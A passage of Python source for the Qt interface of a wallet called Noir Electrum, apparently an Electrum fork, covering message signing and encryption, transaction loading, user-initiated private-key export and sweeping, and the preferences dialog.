keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Noir Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Noir address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Noir address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Noir Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
        # if the user scanned a payment URI ("noir:" scheme)
if str(data).startswith("noir:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
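        # Raw transactions are expected to be QR-encoded in base 43, which fits
        # QR alphanumeric mode better than hex; decode back to hex here before
        # parsing.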
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Noir Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
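        # The export runs in a plain Python thread; progress and completion are
        # reported back to the GUI thread through the two Qt signals connected
        # below (computing_privkeys_signal / show_privkeys_signal).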
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
            s = "\n".join(addr + "\t" + pk for addr, pk in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Noir Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
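    # Illustrative output of the exporter below: in CSV mode, a header row
    # "address,private_key" followed by one row per address; otherwise a JSON
    # object mapping each address to its key.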
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 NOR = 1000 mNOR. 1 mNOR = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Noir Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Noir Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
